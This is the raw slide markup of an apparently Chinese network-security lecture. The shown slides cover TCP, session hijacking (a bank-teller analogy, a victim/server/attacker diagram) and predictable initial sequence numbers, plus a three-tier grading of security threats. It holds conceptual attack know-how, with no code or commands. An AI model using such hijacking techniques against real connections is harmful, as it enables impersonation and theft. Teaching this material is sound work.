        <p:nvSpPr>
          <p:cNvPr id="79973" name="Text Box 203"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3779838" y="188913"/>
            <a:ext cx="2235200" cy="708025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>协议</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79974" name="直接连接符 102"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1799431" y="3320257"/>
            <a:ext cx="504825" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>146</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3476508863"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在现实环境中，比如对于银行一笔交易</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果营业员检查了顾客的身份证和账户卡</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>抬起头来，发现不再是刚才的顾客</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>他会把钱交给外面的顾客吗？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257026" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>交易</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>劫持</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="灯片编号占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BEA0DC0A-6F44-49F5-AC93-87BB6A38D3B8}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>147</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="257031" name="Group 7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1684338" y="3681413"/>
            <a:ext cx="3810000" cy="2386012"/>
            <a:chOff x="748" y="2296"/>
            <a:chExt cx="4263" cy="1503"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="257028" name="Object 4"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="748" y="2296"/>
            <a:ext cx="2400" cy="1503"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s659566" name="Bitmap Image" r:id="rId4" imgW="5353797" imgH="3352381" progId="PBrush">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Bitmap Image" r:id="rId4" imgW="5353797" imgH="3352381" progId="PBrush">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2296"/>
                          <a:ext cx="2400" cy="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30" name="Rectangle 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3152" y="2704"/>
              <a:ext cx="1859" cy="1003"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US">
                  <a:latin typeface="Times New Roman" charset="0"/>
                </a:rPr>
                <a:t>在网络上没有人知道你是一条狗</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26231395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1" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结合了嗅探以及欺骗技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>动机</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>认证协议使得口令不在网络上明文传输</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一次性口令使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Sniffer+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>重放攻击不起作用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话劫持</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>找到当前活动的会话，迫使一方下线，并且把会话接管过来，由劫持者取而代之</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263170" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会话劫持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(session hijacking)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA3E51E9-EF6C-469B-BC2B-1D4FD30635B6}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>148</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201197622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31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3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3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3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3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内容占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>大量通信都基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>连接，单纯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗攻击层次低，难以发挥作用，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>条件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1.A——B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>相互信任，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>冒充</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.ISN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的设置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主机，维持初始序列号计数器，随时间累加（每秒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>+128000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>），每次连接增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>64000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>每次连接取序列号计数器值设置初始序列号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ISN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>因此，可以根据当前连接的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ISN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>推测下次或以后连接的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ISN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会话劫持</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7475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788ECCD7-880C-47B2-BC9C-64B43A21D511}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>149</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2123845932"/>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noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>国际等级划分准则：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>级：个体信息犯罪，单点攻击，简单攻击手法。有自动化、平台化趋势，但单点攻击作用有限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>级：有组织分布式协同攻击，多点、多技术和协同攻击，相互掩护，危害大，难以对付。能够攻击一些专用网络、非标准网络。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>级：战争威胁，更大范围攻击，攻击技术更全面，危害更大。采用一切已知攻击手段，包括可控计算机病毒、信息炸弹、信息炮弹、网络安装软件、使用网络攻击平台、实施一定的战术方案等。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等级保护</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对信息和信息载体按照重要性等级分级别进行保护的一种工作</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="616450" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全威胁分级</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="698864635"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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8647272" y="6407944"/>
            <a:ext cx="365760" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{44BA5A87-D79E-4899-AAAD-C1EEE89A442C}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>150</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260098" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150938" y="617538"/>
            <a:ext cx="7793037" cy="860425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会话劫持示意图</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="260104" name="Group 8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1541463" y="2384425"/>
            <a:ext cx="1133475" cy="1028700"/>
            <a:chOff x="521" y="2069"/>
            <a:chExt cx="1134" cy="969"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="260105" name="Object 9"/>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660698" name="位图图像" r:id="rId4" imgW="1133633" imgH="1028844" progId="PBrush">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="位图图像" r:id="rId4" imgW="1133633" imgH="1028844" progId="PBrush">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6" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="521" y="2750"/>
              <a:ext cx="1134"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被劫持者</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN">
                  <a:latin typeface="Times New Roman" charset="0"/>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260109" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6948488" y="3429000"/>
            <a:ext cx="1655762" cy="457200"/>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服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260111" name="tower"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7451725" y="2205038"/>
            <a:ext cx="576263" cy="12350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zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="260114" name="Group 18"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2339975" y="2565400"/>
            <a:ext cx="4968875" cy="431800"/>
            <a:chOff x="1474" y="1616"/>
            <a:chExt cx="3130" cy="272"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="260112" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1474" y="1888"/>
              <a:ext cx="3130" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="triangle" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="260113" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1565" y="1616"/>
              <a:ext cx="2948"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1 A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                  <a:latin typeface="Times New Roman" charset="0"/>
                </a:rPr>
                <a:t>远程登录，建立会话，完成认证过程</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="260120" name="Group 24"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3708400" y="3357563"/>
            <a:ext cx="1657350" cy="1825625"/>
            <a:chOff x="2336" y="2115"/>
            <a:chExt cx="1044" cy="1150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="260100" name="Group 4"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2381" y="2296"/>
              <a:ext cx="952" cy="969"/>
              <a:chOff x="2336" y="2069"/>
              <a:chExt cx="952" cy="969"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="260101" name="Object 5"/>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660699" name="位图图像" r:id="rId6" imgW="1133633" imgH="1028844" progId="PBrush">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="位图图像" r:id="rId6" imgW="1133633" imgH="1028844" progId="PBrush">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2" name="Text Box 6"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2336" y="2750"/>
                <a:ext cx="952"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攻击者</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN">
                    <a:latin typeface="Times New Roman" charset="0"/>
                  </a:rPr>
                  <a:t>H</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="260115" name="Text Box 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2336" y="2115"/>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2 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                  <a:latin typeface="Times New Roman" charset="0"/>
                </a:rPr>
                <a:t>监听流量</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="260121" name="Group 25"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
